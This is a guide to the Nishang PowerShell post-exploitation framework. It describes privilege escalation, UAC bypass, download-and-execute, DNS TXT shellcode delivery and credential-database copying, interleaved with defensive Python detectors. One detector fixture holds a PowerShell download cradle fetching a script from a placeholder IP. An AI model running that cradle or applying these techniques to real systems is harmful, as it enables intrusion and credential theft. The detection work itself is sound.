
Mastering Windows Post-Exploitation with Nishang: A Comprehensive Guide

Introduction to Nishang

Nishang is a powerful post-exploitation framework developed by Nikhil Mittal. It comprises a collection of PowerShell scripts that can be utilized during the post-exploitation phase of a penetration test. These scripts enable a variety of tasks, including port scanning, information gathering, privilege escalation, credential harvesting, and establishing backdoors. One of the key advantages of Nishang is that it does not require any installation on the target Windows system, as it leverages PowerShell, which is natively available. Additionally, the scripts are executed in memory, leaving minimal traces on the disk.
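Because the scripts run in memory and leave little on disk, the defender's main visibility into them is PowerShell Script Block Logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), which records the text of every script block regardless of whether it ever touched a file. The following is an added example, not code from this guide or from the Nishang project: it triages constructed 4104-style records, flagging blocks that contain one of the script names discussed on this page or that compile their own P/Invoke stubs with Add-Type, and raising priority when the block has no source file path (the in-memory case). The record shape and every value are invented for the example.

```python
import re

# Constructed sample records shaped like Event ID 4104 (Script Block Logging).
# Only the fields the check uses are modelled; every value is invented.
SAMPLE_4104 = [
    {"Path": r"C:\Ops\Rotate-Logs.ps1",
     "ScriptBlockText": "Get-ChildItem C:\\Logs -Filter *.log | "
                        "Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item"},
    {"Path": "",
     "ScriptBlockText": "function Enable-DuplicateToken {\n Add-Type -TypeDefinition $source\n"
                        " ...\n}\nEnable-DuplicateToken"},
    {"Path": "",
     "ScriptBlockText": "Add-Type @'\nusing System.Runtime.InteropServices;\npublic class N { "
                        "[DllImport(\"kernel32.dll\")] public static extern System.IntPtr "
                        "GetCurrentProcess(); }\n'@"},
    {"Path": "",
     "ScriptBlockText": "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"},
]

# Names of the Nishang scripts discussed on this page: a cheap, high-precision check.
NISHANG_NAMES = (
    "Enable-DuplicateToken", "Invoke-PsUACme", "Remove-Update", "Download-Execute-PS",
    "Download_Execute", "Execute-Command-MSSQL", "Execute-DNSTXT-Code", "Out-RundllCommand",
    "Check-VM", "Copy-VSS", "FireBuster", "FireListener", "Get-Information",
)
NAME_RE = re.compile("|".join(re.escape(n) for n in NISHANG_NAMES), re.IGNORECASE)
# Add-Type together with DllImport means the script compiles its own P/Invoke stubs
# to reach Win32 APIs directly, a common trait of in-memory offensive tooling.
PINVOKE_RE = re.compile(r"Add-Type[\s\S]*?DllImport", re.IGNORECASE)


def triage_script_blocks(events):
    """Return (event_index, [reasons]) for script blocks worth an analyst's attention."""
    hits = []
    for i, ev in enumerate(events):
        text = ev.get("ScriptBlockText", "")
        reasons = []
        m = NAME_RE.search(text)
        if m:
            reasons.append(f"known Nishang function name: {m.group(0)}")
        if PINVOKE_RE.search(text):
            reasons.append("Add-Type with DllImport (in-script P/Invoke)")
        # An empty Path means the block did not come from a .ps1 on disk: exactly the
        # in-memory execution described above, so it raises the priority of any finding.
        if reasons and not ev.get("Path"):
            reasons.append("executed in memory (no script file path)")
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in triage_script_blocks(SAMPLE_4104):
        print(idx, "; ".join(why))
```

Script Block Logging has to be turned on through Group Policy or the registry before 4104 events exist at all; once it is, this kind of name and pattern matching is a first pass, and the in-memory flag is what separates an operator pasting tooling into a console from a scheduled script on disk.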

The Importance of Privilege Escalation

Privilege Escalation is a critical phase in the post-exploitation process. After gaining initial access to a system, an attacker often finds themselves with limited user privileges. To achieve their objectives, they need to escalate these privileges to gain higher access levels. Nishang provides three scripts specifically designed for privilege escalation, which are detailed below.

Enable-DuplicateToken

In Windows systems, administrative accounts possess high privileges that allow them to perform most administrative tasks. However, even these accounts face some access restrictions. For instance, administrative accounts do not have access to the “HKLM:\SECURITY” registry key; SYSTEM privileges are required to read it. The Enable-DuplicateToken script duplicates the access token of the “lsass.exe” process, which runs as SYSTEM, and the script executor can then use that token to perform tasks with SYSTEM privileges. It is important to note that the account running this script must already have administrative privileges.
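Duplicating the lsass.exe token starts with opening a handle to that process, and Sysmon records exactly that as Event ID 10 (ProcessAccess). The following is an added example, not code from this guide or from Nishang: it walks constructed Sysmon 10-style records, skips an assumed allowlist of images that legitimately touch lsass, and decodes the GrantedAccess mask into the Win32 process rights it contains, so an analyst can see at a glance whether a handle could have been used for token work (PROCESS_QUERY_INFORMATION) or memory reads (PROCESS_VM_READ). The record shape, image paths and the allowlist are assumptions for the example.

```python
# Constructed Sysmon Event ID 10 (ProcessAccess) records. Real events carry more fields;
# only SourceImage, TargetImage and GrantedAccess are needed here, and all values are invented.
SAMPLE_EID10 = [
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
    {"SourceImage": r"C:\Program Files\Vendor\agent.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Users\alice\Desktop\update.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
]

# Process access rights from the Win32 API (the subset that matters for lsass handles).
ACCESS_BITS = {
    0x0001: "PROCESS_TERMINATE",
    0x0010: "PROCESS_VM_READ",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# Images that legitimately open lsass on a typical host (assumption: tune per environment).
BASELINE_SOURCES = {"csrss.exe", "wininit.exe", "services.exe", "lsm.exe", "msmpeng.exe"}


def basename(path):
    """Last path component, lower-cased, for Windows paths."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_access(mask_hex):
    """Translate a Sysmon GrantedAccess value such as '0x1400' into named rights."""
    mask = int(mask_hex, 16)
    return [name for bit, name in sorted(ACCESS_BITS.items()) if mask & bit]


def find_lsass_access(events, baseline=BASELINE_SOURCES):
    """Report non-baseline processes that opened lsass.exe, with the rights they obtained."""
    findings = []
    for ev in events:
        if basename(ev["TargetImage"]) != "lsass.exe":
            continue
        src = basename(ev["SourceImage"])
        if src in baseline:
            continue
        rights = decode_access(ev["GrantedAccess"])
        # OpenProcess with PROCESS_QUERY_INFORMATION is the first step of any token
        # manipulation (it is what OpenProcessToken needs); PROCESS_VM_READ points at memory reads.
        severity = ("high" if "PROCESS_QUERY_INFORMATION" in rights or "PROCESS_VM_READ" in rights
                    else "medium")
        findings.append({"source": src, "rights": rights, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in find_lsass_access(SAMPLE_EID10):
        print(f["severity"], f["source"], ", ".join(f["rights"]))
```

On a live host the same records come from the Microsoft-Windows-Sysmon/Operational log (for example via Get-WinEvent), provided the Sysmon configuration includes a ProcessAccess rule for lsass.exe; the allowlist is the part that needs tuning, since security agents and some management tooling open lsass routinely.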

Invoke-PsUACme

This script bypasses User Account Control (UAC) using methods taken from the UACME repository, which rely on DLL hijacking and on manipulating executable file names and locations. The Invoke-PsUACme script accepts several parameters, including:

  • Payload: Specifies the PowerShell command to be executed on the process with elevated privileges.
  • Method: Determines the method used for privilege escalation. The default method is “sysprep”.
  • Path: Specifies the path for the payload. The default path is “C:\Windows\temp\cmd.bat”.
  • CustomDLL64: Specifies the path for a custom 64-bit DLL file.
  • CustomDLL32: Specifies the path for a custom 32-bit DLL file.
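The bypass methods above only work while UAC is configured to auto-elevate trusted Windows binaries without a prompt, which is the default "Notify me only when apps try to make changes" level. As an added example (not part of this guide or of Nishang), the following check evaluates the UAC policy values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, comparing a constructed default-style configuration with a hardened one; the value names and their meanings are the documented Windows ones, and the two configurations are invented for the example.

```python
# Registry location of the UAC policy values (documented Windows key).
UAC_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Constructed examples: a default-style (weak) configuration and a hardened one.
WEAK = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 5,
        "PromptOnSecureDesktop": 1, "FilterAdministratorToken": 0}
HARDENED = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 2,
            "PromptOnSecureDesktop": 1, "FilterAdministratorToken": 1}


def assess_uac(values):
    """Return (value_name, why_it_matters) for each UAC setting weaker than 'Always notify'.

    Missing values fall back to the Windows defaults (EnableLUA=1,
    ConsentPromptBehaviorAdmin=5, PromptOnSecureDesktop=1, FilterAdministratorToken=0).
    """
    findings = []
    if values.get("EnableLUA", 1) != 1:
        findings.append(("EnableLUA", "UAC is disabled entirely; no bypass is needed"))
    cpba = values.get("ConsentPromptBehaviorAdmin", 5)
    if cpba == 0:
        findings.append(("ConsentPromptBehaviorAdmin", "administrators elevate silently"))
    elif cpba != 2:
        # Any level below 'Always notify' (2) lets auto-elevating Windows binaries such as
        # sysprep elevate without a prompt, which is what DLL-hijacking bypasses rely on.
        findings.append(("ConsentPromptBehaviorAdmin",
                         f"level {cpba} is not 'Always notify' (2); auto-elevation stays enabled"))
    if values.get("PromptOnSecureDesktop", 1) != 1:
        findings.append(("PromptOnSecureDesktop", "elevation prompt is not on the secure desktop"))
    if values.get("FilterAdministratorToken", 0) != 1:
        findings.append(("FilterAdministratorToken",
                         "built-in Administrator runs without a filtered token"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, assess_uac(cfg) or "no findings")
```

On a real host the values can be exported with reg query against the key above and fed in as the dictionary; moving ConsentPromptBehaviorAdmin to 2 removes the auto-elevation these techniques depend on, at the cost of more prompts for administrators.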

Remove-Update

This script removes updates from the system, either all of them or a specific one: the “KBID” parameter specifies the ID of the update to be removed. This can be useful in scenarios where specific updates interfere with the execution of certain exploits or payloads.

Executing Commands and Payloads

During the post-exploitation phase, there are often situations where an attacker needs to execute commands or payloads from a remote location. Nishang provides several methods for executing commands, which are detailed below.

Download-Execute-PS

This script downloads and executes a PowerShell script from a specified URL. The URL is specified using the “ScriptURL” parameter. The script can be executed with arguments specified using the “Arguments” parameter. If the script should not be saved on the target machine, the “Nodownload” parameter can be used.

Download_Execute

This script converts a text file containing an executable into a runnable application and executes it. The only parameter required is the “URL” parameter, which specifies the URL from which the file is downloaded and executed. The “exetotext.ps1” script in Nishang can be used to convert an executable into a text file.

Execute-Command-MSSQL

This script allows an attacker to execute commands on a remote MSSQL Server. By specifying the administrator username and password for the MSSQL Server service, the script enables the xp_cmdshell stored procedure, which can then be used to execute commands on the target machine. If Windows Authentication is used by MSSQL, the script can leverage this authentication method, and no username or password is required. The parameters for this script include:

  • ComputerName: The name or IP address of the machine running the MSSQL Server.
  • UserName: The administrator username for the MSSQL Server.
  • Password: The password for the administrator user.
  • WindowsAuthentication: This parameter is used to specify that SQL Server Windows Authentication should be used.
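Enabling xp_cmdshell is a configuration change that SQL Server writes to its ERRORLOG in a fixed message format, so it is one of the easiest steps of this technique to detect. The following is an added example, not code from this guide or from Nishang: it parses a constructed ERRORLOG excerpt, lists every sp_configure change, and reports an xp_cmdshell enablement together with the most recent successful login seen before it (user and client address). The message texts are the ones SQL Server emits; the timestamps, spids and addresses are invented.

```python
import re

# Constructed SQL Server ERRORLOG excerpt. The message texts are the ones SQL Server writes
# when sp_configure changes an option; the timestamps, spids and client address are invented.
SAMPLE_ERRORLOG = """\
2024-03-04 09:12:01.33 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.9]
2024-03-04 09:12:02.10 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-04 09:12:02.41 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-04 11:40:17.02 spid71      Configuration option 'max server memory (MB)' changed from 2147483647 to 16384. Run the RECONFIGURE statement to install.
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<src>\S+)\s+(?P<msg>.*)$")
CONFIG_RE = re.compile(r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\S+) to (?P<new>\S+)\.")
LOGIN_RE = re.compile(r"Login succeeded for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]")


def parse_errorlog(text):
    """Split ERRORLOG lines into timestamp, source (spid or 'Logon') and message."""
    return [m.groupdict() for m in (LINE_RE.match(l) for l in text.splitlines()) if m]


def config_changes(text):
    """Every sp_configure change recorded in the log, in order."""
    out = []
    for ev in parse_errorlog(text):
        cm = CONFIG_RE.search(ev["msg"])
        if cm:
            out.append({"ts": ev["ts"], "spid": ev["src"], **cm.groupdict()})
    return out


def detect_xp_cmdshell_enable(text):
    """Flag xp_cmdshell being switched on, attributing it to the last successful login seen."""
    findings, last_login = [], None
    for ev in parse_errorlog(text):
        lm = LOGIN_RE.search(ev["msg"])
        if lm:
            last_login = (ev["ts"], lm["user"], lm["client"])
            continue
        cm = CONFIG_RE.search(ev["msg"])
        if cm and cm["opt"] == "xp_cmdshell" and cm["new"] == "1":
            findings.append({"ts": ev["ts"], "spid": ev["src"], "last_login": last_login})
    return findings


if __name__ == "__main__":
    for f in detect_xp_cmdshell_enable(SAMPLE_ERRORLOG):
        print(f["ts"], f["spid"], "xp_cmdshell enabled; last login:", f["last_login"])
```

The same change is also visible through SQL Server Audit or the sp_configure value itself, but the ERRORLOG needs no prior setup; pairing the change with the preceding login is what turns a configuration line into something an incident responder can act on.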

Execute-DNSTXT-Code

This script utilizes DNS TXT queries to execute shellcode on the target system. The script retrieves payload shellcode from DNS TXT records, decodes it from Base64, and executes it, thereby establishing a connection. The “Out-DnsTxt” script in Nishang can be used to place the shellcode in Base64 format into DNS TXT records. The script requires at least three parameters: “shellcode32”, “shellcode64”, and “AuthNS”. These parameters specify the domain names where the 32-bit and 64-bit shellcode in Base64 format are located, and an authoritative nameserver.
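Shellcode delivered over DNS TXT records looks nothing like the TXT records a network normally resolves (SPF, DMARC, domain verification strings): it is long, drawn from the Base64 alphabet and close to random. The following is an added example, not code from this guide or from Nishang: it scores constructed resolver log entries by length, Base64 character set and Shannon entropy, and reports the TXT answers that look like encoded payloads. The log format, client addresses and domain names are invented, and the payload-like record is a deterministic stand-in built from hash output rather than any real content.

```python
import base64
import hashlib
import math
import re


def _opaque_blob():
    # Deterministic pseudo-random bytes standing in for an opaque TXT payload (constructed).
    return b"".join(hashlib.sha256(bytes([i])).digest() for i in range(8))


# Constructed resolver log entries: (client, qname, qtype, rdata). The format is invented.
SAMPLE_DNS_LOG = [
    ("10.0.0.23", "example.com", "TXT", "v=spf1 include:_spf.example.net -all"),
    ("10.0.0.23", "_dmarc.example.com", "TXT", "v=DMARC1; p=reject; rua=mailto:dmarc@example.com"),
    ("10.0.0.41", "s64.c2.example.test", "TXT", base64.b64encode(_opaque_blob()).decode()),
    ("10.0.0.41", "www.example.com", "A", "93.184.216.34"),
]

B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def shannon_entropy(s):
    """Bits per character; near 0 for repetitive text, up to 6 for uniform Base64."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_like_encoded_payload(rdata, min_len=100, min_entropy=4.5):
    """True when a TXT value is long, Base64-only and high-entropy (thresholds are assumptions)."""
    return (len(rdata) >= min_len
            and B64_RE.match(rdata) is not None
            and shannon_entropy(rdata) >= min_entropy)


def find_suspicious_txt(log):
    """Report TXT answers that look like encoded payloads rather than policy records."""
    out = []
    for client, qname, qtype, rdata in log:
        if qtype == "TXT" and looks_like_encoded_payload(rdata):
            out.append({"client": client, "qname": qname, "length": len(rdata),
                        "entropy": round(shannon_entropy(rdata), 2)})
    return out


if __name__ == "__main__":
    for hit in find_suspicious_txt(SAMPLE_DNS_LOG):
        print(hit)
```

A payload larger than one record is normally spread over several queries, so in practice the scores are aggregated per client and per parent domain rather than judged one answer at a time; the length and entropy thresholds above are starting points to tune against the TXT traffic a given network actually sees.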

Out-RundllCommand

This script generates commands that can be executed by the rundll32.exe application. When these commands are executed on the target machine, a PowerShell session is established. The script requires two parameters: “IPAddress” and “Port”. The “IPAddress” parameter specifies the IP address of the attacker’s machine where the listener is started, and the “Port” parameter specifies the port on which the listener is running.

Gathering Information

After compromising a machine, an attacker needs to gather information to proceed with the post-exploitation phase. This information can include host details, credentials, and other sensitive data. Nishang provides several scripts for information gathering, which are detailed below.

Check-VM

This script checks whether the machine is running in a virtual environment. It examines registry keys and running services to detect the presence of virtualization software such as Hyper-V, VMware, VirtualBox, Virtual PC, Xen, and QEMU.

Copy-VSS

This script creates copies of the SAM and NTDS.DIT databases and of the SYSTEM hive, which are used to store credentials in Windows systems. These files are locked while the operating system is running, so the script uses a volume shadow copy to obtain copies of them for further analysis.
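Several of the scripts above leave a distinctive process-creation trail: Remove-Update removes updates, the download-and-execute scripts fetch code over HTTP from PowerShell, Out-RundllCommand has rundll32.exe start a PowerShell session, and Copy-VSS relies on a shadow copy to reach the locked hives. The following is an added example that serves all of those passages; it is not code from this guide or from Nishang. It runs a small rule set over constructed process-creation records shaped like Sysmon Event ID 1 / Security 4688 fields. The assumptions are that update removal goes through wusa.exe /uninstall and shadow copies through vssadmin or wmic, which are the usual built-in paths; all paths, command lines and the KB number are invented.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 field names).
# All image paths, command lines and the KB number are invented for the example.
SAMPLE_PROC = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\Ops\\Rotate-Logs.ps1"},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"...\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://192.0.2.10/Get-Information.ps1')\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wusa.exe",
     "CommandLine": "wusa.exe /uninstall /kb:1234567 /quiet /norestart"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin create shadow /for=C:"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p"},
]


def base(path):
    """Last path component, lower-cased, for Windows paths."""
    return path.rsplit("\\", 1)[-1].lower()


# Each rule: (name, predicate over one record). Kept declarative so rules can be added or tuned.
RULES = [
    ("rundll32 spawning PowerShell (Out-RundllCommand-style launcher)",
     lambda ev: base(ev["ParentImage"]) == "rundll32.exe" and base(ev["Image"]) == "powershell.exe"),
    ("PowerShell download cradle (DownloadString/DownloadFile)",
     lambda ev: base(ev["Image"]) == "powershell.exe"
                and re.search(r"download(string|file)", ev["CommandLine"], re.I) is not None),
    ("update removal via wusa /uninstall (Remove-Update)",
     lambda ev: base(ev["Image"]) == "wusa.exe" and "/uninstall" in ev["CommandLine"].lower()),
    ("shadow copy creation, a path to the locked SAM/SYSTEM/NTDS.DIT files (Copy-VSS)",
     lambda ev: base(ev["Image"]) in ("vssadmin.exe", "wmic.exe")
                and re.search(r"create shadow|shadowcopy call create", ev["CommandLine"], re.I) is not None),
]


def match_rules(events, rules=RULES):
    """Return (event_index, [matching rule names]) for every record that trips at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        names = [name for name, pred in rules if pred(ev)]
        if names:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for idx, names in match_rules(SAMPLE_PROC):
        print(idx, SAMPLE_PROC[idx]["CommandLine"])
        for n in names:
            print("   ", n)
```

None of these rules is conclusive on its own (administrators uninstall updates and backup software creates shadow copies), which is why the output keeps the parent image and full command line: the combination of an unusual parent, a hidden-window PowerShell and a remote fetch, within minutes on one host, is what an analyst escalates.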

FireBuster

This script determines which port can be used to exfiltrate data from the network. It performs a port scan to find open ports and then sends all packets to a listener started by FireListener.

FireListener

FireListener starts a listener that can receive packets sent by FireBuster. This allows an attacker to exfiltrate data from the target network.

Get-Information

This script gathers information from the target machine. It retrieves data from the registry and executes various commands to extract sensitive information.
